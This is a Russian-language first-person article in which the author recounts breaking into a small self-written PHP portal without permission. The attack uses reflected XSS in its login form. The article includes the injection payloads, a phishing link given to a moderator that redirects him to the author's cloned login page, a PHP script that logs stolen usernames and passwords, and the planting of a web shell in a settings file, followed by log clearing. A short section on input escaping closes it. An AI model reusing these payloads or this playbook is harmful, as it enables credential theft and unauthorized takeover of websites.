В данной статье я намерен описать один из взломов, проведенных мной с использованием техники xss атак. А так же доказать начинающим веб-программистам, что не такая мелочь – этот xss. В данной статье не будет глупых попыток увести куки админа – здесь этому виду атак дана новая жизнь. В первую очередь я рекомендую прочитать статью веб-программистам, наивно полагающим, что их скрипты в безопасны. После прочтения многие из вас изменят свое мнение.

    В этом году я провел небольшой тест, на безопасность веб ресурсов, написанных «начинающими программистами». И что вы думаете? Каждый третий из проверяемых мной сайтов был подвержен xss атаке, т.к. сегодняшние малограмотные программисты очень плохо представляют себе все тонкости этого дела. Далее я намерен описать реальный случай из моей практики, который является четким шаблоном успешной Cross site scripting атаки. Все нижеизложенное предназначено только для ознакомления и закрытия дыр, в первую очередь в головах программистов.

    Эта история началась с того, что я нашел в рунете один небольшой портальчик. Сам по себе он был бесполезен и неинформативен. Там были какие-то бесполезные статьи о жизни, чат и форум. Но меня заинтересовало другое. Данный сайт базировался не на каком либо известном движке, а был самостоятельно написан на php. После прочтения информации о сайте я в этом убедился. У меня сразу же возникло ужасное желание протестировать его на защищенность. На этом сайте, при регистрации создавался один аккуант на чат, форум и администраторскую часть (разумеется, туда пускали только «особых членов»). Т.е. если удастся спереть логин и пароль админа, то с сайтом я смогу творить что угодно. Это и стало главной задачей.

    Сервер работал по стандартной схеме. Если вы не авторизированны, то в правом верхнем углу экрана вы можете ввести логин/пароль для входа на сайт. Гостю были доступны только некоторые (самые убогие) разделы сайта. Это сразу привлекло мое внимание. Первым делом я ввел левый логин и оформил запрос, нажав на кнопку «Войти». Хорошо, я получил ошибку «Данный юзер не существует» и скрипт впечатал мой логин в соответствующее поле на форме. Я знал, что скрипт будет печатать логин на форме, следовательно далее проверяем на стандартную xss. Интересно, предусмотрело ли юное дарование, что я не совсем традиционно оформлю запрос? Ответ оказался – нет, не предусмотрело. После ошибки, мой логин был любезно напечатан на странице приблизительно такой строкой php кода:

<input type=text name=login value=”<?=$login ?>”>

    Как я узнал позже, это предположение оказалось правильным. Вот именно из-за этой строчки возможно выполнение xss атаки. Если кто не понял – объясняю. Скрипт не проверяет вводимые пользователем данные и не переводит их в html символы, а затем просто печатает их в теге input свойства value. Это является грубейшей ошибкой, т.к. если правильно оформить запрос (см ниже), то мы выйдем за пределы тега input и выполним свой код(не php):

“><h1>stuped_lamer
(если кто не понял, это я ввел в поле “логин”)

Символами “> мы выходим из этого тега, а далее просто пишем свой код. В данном случаем выполнится <h1>stuped_lamer.

    Отлично! XSS атака возможна, далее, главной задачей является получение логина и пароля администратора. Следующим шагом я зарегился у них на сервере. После входа под моим ником мне стала видна табличка с надписью «кто сейчас на сайте». Там я увидел, что какой-то крендель с полномочиями охранника (не админа!) сидит в чате. Иду за ним. Чат был тоже самописным. Возможно там тоже были дыры, но искать я их не стал – это был «план Б».

    Вся атака, глазами «охранника» выглядела примерно вот так - у него закончилось время действия сессии, далее его перекинуло на главную страницу сервера (это было отчетливо видно в адресной строке!) для авторизации. Теперь я расскажу, как это выглядело «по ту сторону фокуса». Разумеется, все эти манипуляции с «охранником» сотворил мой скрипт, который он сам выполнил, зайдя по моей ссылки. Заставить его нажать на злополучную ссылку не составило никакого труда. Как оказалось, сидевший в чате охранник был автором какой-то статьи с этого сервера. Ну вот я и указал ему сайт, на котором кто-то копировал его труды и изменял авторство =)) В чате был специальный тег, позволяющий вставлять ссылки в чат. При этом и сама ссылка и заголовок устанавливались разными. Т.е. нажав на http://domain.com его кидало не на на http://domain.com, а на дырявую страницу его сайта, где и выполнялся скрипт, приложенный к адресу.

    Для тех кто не понял объясняю детально. Я знал, что скрипт авторизации дырявый и передаются в него логин, пароль и имя кнопки отправки, т.к. иначе скрипт отображал поля ввода и кнопку. Скрипт назывался login.php. Просмотрев форму отправки в html виде я понял, что в параметрах name и pass – передаются логин и пароль соответственно. Имя кнопки отправки – submit. Следовательно, если зайти по ссылке http://адресс_сайта/login.php?pass=&login=”> <h1>Hello_admin&submit - выполнится наш скрипт, который мы передаем в переменной login. Разумеется, здороваться с админом нам не нужно, поэтому в переменной логин нужно предать другой скрипт. Он должен реально закрыть сессию админа, перекинуть его на главную страницу и перехватить введенный от туда логин и пароль.

    Все просто. Приступаем. С закрытием сессии все было совсем просто. В каждый скрипт передавался, методом get, номер сессии, и если его не получали, то вас считали гостем и закрывали сессию. Сайт состоял из фреймов, их было три: на авторизацию, разделы сайта и самый основной, для загрузки страниц. Фрейм на авторизацию назывался avtorizacia, т.е. если зайти по ссылке <a target=”avtorizacia” href=http://my_sait/page.php>ссылка</a> - то http://my_sait/page.php откроется не в новом окне, а именно во фреме авторизации сайта. Т.е. для выполнения задуманного, нам необходимо, чтобы охранник зашел по трем ссылка. Одна – закрытие авторизации и перекидывании на главную страницу сервера (адресная строка это подтверждает). Вторая – на подмену фрейма авторизации, чтобы там грузилась наша пага, идентичная той. Третья ссылка – и есть сайт с клонированной статьей (чтобы охрана не заподозрила меня во взломе, – читай для отвода глаз), я дал ссылку на еррор 404.

    Финальный вариант ссылки с редиректами выглядит примерно вот так:

“>http://адресс_сайта/login.php?pass=&login=”> <script>window.location.href='/index.php';</script>
<script>window.location.href='http://адресс_моего_сайта/login.php ' target=avtorizacia;</script>
<script>window.location.href='http://super_sait.com';</script>&submit

Так же у меня был сайт на holm.ru где лежало два скрипта: один login.php – идентичный ихнему, он отсылал запрос на второй файл, второй - save.php для сохранения переменных:

<?php
$open=fopen(lamer.html, “a+”);
fwrite($open, “Имя: $login Пароль: $pass <hr>”);
echo “Проверьте правильность логина/пароля и повторите попытку”:
?>

    Вот так я и получил акаунт охранника. Далее я зашел в администраторскую часть сайта. Я сразу обломался и понял, что у меня практически нет никакой власти. Единственное, что я мог - модерировать форум, чат, банить юзеров, а так же имелся доступ к настройкам этого портала. В настройках был доступен один файл с расширением php, где хранились все настройки цвета, шрифтов и т.п. Это сразу же вызвало улыбку =)). Даже не думал заливать туда вот такую фигню , а скопировал туда php код своего шела. После этого написал в адресной строке полный путь до этого файлика и узрел знакомый face своего скрипта. Получается, что доступ к настройкам не был закрыт из вне? Просто сказочное ламерство!

    Вот так просто я получил полный доступ к дирам сайта. Ничего дефейсить я там не стал, почистив логи просто свалил. Потом написал письмо админу сайта о найденном баге. Ответа я так и не получил, но спустя пару дней xss’ки на сайте уже не было =))

Защита

    Что касается защиты от подобного рада атак, так тут все вообще просто. Весь секрет состоит в том, чтобы перед печатью переменных максимально их обезопасить. Можно перевести их в html знаки. В php это можно сделать вот так:

$login = htmlspecialchars($login);

    Или можно просто удалить все теги из логина:

$login=strip_tags($login);